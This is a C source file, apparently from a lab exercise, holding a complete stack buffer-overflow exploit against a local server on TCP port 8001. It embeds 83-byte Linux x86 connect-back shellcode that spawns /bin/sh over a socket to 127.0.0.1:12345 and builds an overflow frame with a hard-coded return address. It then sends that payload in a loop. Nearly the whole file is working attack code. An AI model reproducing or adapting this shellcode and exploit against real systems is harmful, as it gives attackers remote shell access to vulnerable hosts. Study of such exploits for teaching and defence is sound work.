/*---------------------------------------------------------------------------*
 * 83-byte connect-back shellcode (Linux/x86 32-bit, int 0x80): connects to  *
 * 127.0.0.1:12345 and spawns /bin/sh over that socket.  A listener must be  *
 * waiting on that port (e.g. `nc -lvp 12345`) before the exploit is run.    *
 * Author: Victor BUSA                                                       *
 *---------------------------------------------------------------------------*/
#include <string.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <stdio.h>
#include <errno.h>
#include <netdb.h>
#include <time.h>
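#define PORTNUM 8001   /* TCP port the vulnerable server listens on */
#define BLENGTH 256    /* frame size exchanged with the server, both directions */
#define OFFSET 141     /* bytes of payload that matter; the rest is zero padding */

/*
 * Linux/x86 (32-bit, int 0x80) connect-back shellcode, 83 bytes, NUL-free.
 * Decoded from the bytes below:
 *   socketcall(SYS_SOCKET)  -> socket(AF_INET, SOCK_STREAM, 0)
 *   socketcall(SYS_CONNECT) -> connect(fd, {AF_INET, 0x3039, 127.0.0.1}, 16)
 *                              (0x0100007f is built as NOT 0xfeffff80 to avoid
 *                              NUL bytes; the port 12345 is pushed big-endian)
 *   dup2(fd, 2), dup2(fd, 1), dup2(fd, 0)
 *   execve("/bin//sh", ["/bin//sh"], NULL)
 * The connect-back host and port are hard-coded: a listener must already be
 * waiting on 127.0.0.1:12345 when the payload executes on the target.
 */
char shellcode[]=
"\x31\xdb\xf7\xe3\xfe\xc3\xb0\x66"
"\x99\x52\x6a\x01\x6a\x02\x89\xe1"
"\xcd\x80\x96\x6a\x66\x58\x43\xbf"
"\x80\xff\xff\xfe\xf7\xd7\x57\x66"
"\x68\x30\x39\x66\x53\x89\xe1\x6a"
"\x10\x51\x56\x89\xe1\x43\xcd\x80"
"\x87\xde\x6a\x02\x59\xb0\x3f\xcd"
"\x80\x49\x79\xf9\xb0\x0b\x52\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69"
"\x6e\x89\xe3\x52\x89\xe2\x53\x89"
"\xe1\xcd\x80";

/*
 * Read exactly `len` bytes from stream socket `s` into `dst`.
 * Returns 0 on success and -1 on EOF or error.  A stream socket may split
 * one BLENGTH-byte frame across several recv() calls, so a single recv()
 * result cannot simply be compared against BLENGTH.
 */
static int
recv_exact(int s, unsigned char *dst, size_t len)
{
    size_t got = 0;

    while (got < len) {
        ssize_t r = recv(s, dst + got, len - got, 0);
        if (r <= 0) {
            return -1;
        }
        got += (size_t)r;
    }
    return 0;
}

/*
 * Write all `len` bytes of `src` to stream socket `s`.
 * Returns 0 on success and -1 if the peer went away or send() failed.
 */
static int
send_exact(int s, const unsigned char *src, size_t len)
{
    size_t sent = 0;

    while (sent < len) {
        ssize_t w = send(s, src + sent, len - sent, 0);
        if (w <= 0) {
            return -1;
        }
        sent += (size_t)w;
    }
    return 0;
}

/*
 * Drive the server's prompt/response exchange over socket `s` until the
 * peer closes or an I/O call fails.  Each round: receive a BLENGTH-byte
 * prompt and echo it to stdout, answer with "1\n" (the menu choice the
 * server appears to expect -- confirm against the server source), then
 * send the BLENGTH-byte overflow payload.
 *
 * Payload layout (bytes OFFSET..BLENGTH-1 are zero):
 *
 *   | shellcode (83) | 0x90 fill | return addr @ OFFSET-5 | 0x90 | zeros |
 *
 * Because the NOP fill sits *after* the shellcode, it gives no landing
 * tolerance: the return address must point at byte 0 of the server's
 * `response` buffer (the first shellcode byte), not into the fill.  The
 * value 0x016e72f4 was read in gdb (break at the server's line 81, take the
 * address of `response`); it only holds for that exact binary with ASLR
 * and PIE disabled and must be re-derived for any other build.
 */
static void
loop(int s)
{
    unsigned char buffer[BLENGTH];

    for (;;) {
        /* Receive the prompt; stop on EOF, error or a truncated frame. */
        if (recv_exact(s, buffer, BLENGTH) != 0) {
            break;
        }
        /* The prompt carries no NUL terminator, so print it length-bounded
         * instead of handing an unterminated buffer to fputs(). */
        fwrite(buffer, 1, BLENGTH, stdout);
        fflush(stdout);

        /* Simulate the user typing "1"; pad the rest of the frame with NULs. */
        memset(buffer, 0, sizeof buffer);
        memcpy(buffer, "1\n", 2);
        if (send_exact(s, buffer, BLENGTH) != 0) {
            break;
        }

        /* Build the overflow payload: shellcode, 0x90 fill, return address. */
        memset(buffer, 0, sizeof buffer);
        memset(buffer, 0x90, OFFSET);
        memcpy(buffer, shellcode, sizeof shellcode - 1);      /* drop the trailing NUL */
        memcpy(buffer + OFFSET - 5, "\xf4\x72\x6e\x01", 4);    /* 0x016e72f4, little-endian */
        if (send_exact(s, buffer, BLENGTH) != 0) {
            break;
        }
    }
}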
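/*
 * Entry point: open an IPv4 TCP connection to the vulnerable server on
 * localhost:PORTNUM and hand the socket to loop(), which runs the exploit.
 * Exits with EXIT_FAILURE if the name cannot be resolved, the socket cannot
 * be created, or the connection fails.
 */
int
main(void)
{
    struct sockaddr_in server;
    struct hostent *host;
    int s;

    /* Resolve the loopback name first so a lookup failure leaves no socket
     * behind.  gethostbyname() reports errors through h_errno, not errno, so
     * perror() would print an unrelated message here. */
    host = gethostbyname("localhost");
    if (host == NULL) {
        herror("gethostbyname()");
        exit(EXIT_FAILURE);
    }
    /* Only an IPv4 address of exactly sizeof(sin_addr) may be copied into
     * the sockaddr_in; anything else would truncate or overrun it. */
    if (host->h_addrtype != AF_INET || host->h_addr_list[0] == NULL ||
        (size_t)host->h_length != sizeof server.sin_addr) {
        fputs("gethostbyname(): no IPv4 address for localhost\n", stderr);
        exit(EXIT_FAILURE);
    }

    memset(&server, 0, sizeof server);
    server.sin_family = AF_INET;
    server.sin_port = htons(PORTNUM);
    memcpy(&server.sin_addr, host->h_addr_list[0], sizeof server.sin_addr);

    /* Create an Internet family, stream socket */
    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s < 0) {
        perror("socket()");
        exit(EXIT_FAILURE);
    }
    if (connect(s, (struct sockaddr *)&server, sizeof server) < 0) {
        perror("connect()");
        close(s);
        exit(EXIT_FAILURE);
    }

    /* Talk to the server until it closes the connection, then clean up. */
    loop(s);
    close(s);
    return 0;
}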